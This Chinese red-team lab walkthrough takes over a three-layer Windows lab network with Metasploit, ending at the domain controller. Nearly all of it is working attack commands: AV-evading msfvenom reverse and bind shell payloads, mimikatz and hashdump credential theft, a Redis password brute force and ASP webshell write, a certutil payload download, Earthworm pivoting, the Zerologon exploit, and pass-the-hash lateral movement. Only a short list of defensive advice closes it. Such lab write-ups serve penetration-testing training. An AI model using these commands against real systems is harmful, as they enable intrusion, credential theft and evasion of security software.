红队攻防实战系列一之MSF渗透指南

环境配置

网络拓扑

攻击机：
- Win10：192.168.1.6
- Kali：192.168.1.10

第一层：12server-bt
- 192.168.1.5 (外网)
- 192.168.59.133 (内网)

第二层：12server-redis
- 192.168.59.4
- 10.10.10.202

第三层：
- 12server-ex13 (邮服)：10.10.10.209
- 12server-dc (域控)：10.10.10.201

网络访问限制

• 192.168.59.133：存在火绒杀软，可通外网，可访问server-redis
• 192.168.59.4/10.10.10.202：不通外网，可访问内网机器及server-bt
• 10.10.10.209：邮服，仅限内网互访
• 10.10.10.201：域控制器(DC)

第一层渗透：server-bt

1. 蚁剑获取初始访问

1. 通过CMS漏洞获取Webshell
2. 使用蚁剑连接Webshell

2. MSF免杀木马制作与上线

生成免杀Payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=6666 -e x86/shikata_ga_nai -i 12 -f raw -o msf.bin

使用分离免杀工具生成loader.exe

1. 使用免杀工具处理msf.bin生成loader.exe
2. 对生成的exe进行加壳处理增强免杀效果

上传与执行

1. 通过蚁剑上传loader.exe到目标服务器
2. 在蚁剑中执行loader.exe

MSF监听设置

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set lport 6666
run

3. 权限维持与提升

进程迁移

getuid
ps
migrate 476  # 迁移到稳定进程

凭证获取

load mimikatz
mimikatz_command -f samdump::hashes
hashdump

远程桌面配置

run post/windows/manage/enable_rdp

添加用户绕过杀软

1. 上传添加用户工具(adduser.exe)
2. 执行添加用户命令

完全提权

1. 使用PsExec获取SYSTEM权限：

   psexec.exe -accepteula -s -i -d cmd.exe
   

2. 结束原用户桌面进程
3. 从SYSTEM权限启动新桌面进程

第二层渗透：server-redis

1. Earthworm内网穿透

服务器端配置

execute C:\wwwroot\ew.exe -s ssocksd -l 1090

攻击机配置

编辑/etc/proxychains.conf：

socks5 192.168.1.5 1090

2. Redis漏洞利用

Redis密码爆破

proxychains hydra -P /usr/share/wordlists/password.lst 192.168.59.4 redis 6379

Redis写Webshell

proxychains src/redis-cli -h 192.168.59.4 -a [密码]
config set dir "C:\\inetpub\\wwwroot"
config set dbfilename "redis.asp"
set x "<%eval request(\"chopper\")%>"
save

蚁剑连接Webshell

1. 通过代理连接新创建的Webshell
2. 上传提权工具(SweetPotato.exe)并执行

3. MSF正向连接

生成正向Payload

msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f raw -o msf1.bin

免杀处理

1. 使用免杀工具生成loader.exe
2. 重命名为msf1.exe并加壳

文件传输

1. 上传到server-bt
2. 从server-redis下载：

   certutil -urlcache -split -f http://192.168.59.133/msf1.exe msf1.exe
   

执行Payload

C:\ProgramData\xxxx.exe -i -c "msf1.exe"

MSF监听配置

proxychains msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.59.4
set lport 4444
run

4. 内网信息收集

路由配置

run autoroute -s 10.10.10.0/24
run autoroute -p

内网扫描

1. 上传nbtscan.exe
2. 执行内网扫描：

   nbtscan.exe 10.10.10.0/24
   

第三层渗透：域控(server-dc)

1. Zerologon漏洞利用(CVE-2020-1472)

置空域控机器账户NTLM hash

proxychains python3 cve-2020-1472-exploit.py 12server-dc$ 10.10.10.201

Dump域内所有hash

proxychains secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'domain.com/12server-dc$@10.10.10.201'

2. 横向移动

WMIExec执行命令

proxychains wmiexec.py -hashes :42e2656ec5aa123462387 administrator@10.10.10.201

PTH上线域控到MSF

proxychains msfconsole
use exploit/windows/smb/psexec
set RHOST 10.10.10.201
set SMBUser Administrator
set SMBPass aad3b435b51404ee:42e2656ec5aa123462387
set SMBDomain domain
set payload windows/x64/meterpreter/bind_tcp_rc4
set LPORT 4446
run

上线邮服(server-ex13)

proxychains msfconsole
use exploit/windows/smb/psexec
set RHOST 10.10.10.209
set SMBUser Administrator
set SMBPass aad3b435b51404ee:42e2656ec5aa123462387
set SMBDomain domain
set payload windows/x64/meterpreter/bind_tcp_rc4
set LPORT 4447
run

关键工具与技术总结

1. MSF免杀技术：

   • Shikata_ga_nai编码
   • 分离免杀loader
   • 加壳处理

2. 内网穿透：

   • Earthworm (EW)
   • Proxychains配置

3. 权限提升：

   • SweetPotato (甜土豆)
   • PsExec
   • 进程迁移技术

4. 横向移动：

   • Zerologon漏洞利用
   • Pass-the-Hash (PTH)
   • WMIExec

5. 持久化：

   • 添加用户
   • 开启RDP
   • 计划任务

防御建议

1. 及时修补已知漏洞(如Zerologon)
2. 加强Redis等中间件安全配置
3. 实施网络分段隔离
4. 部署EDR解决方案检测异常行为
5. 监控特权账户异常活动
6. 定期审计域内机器账户权限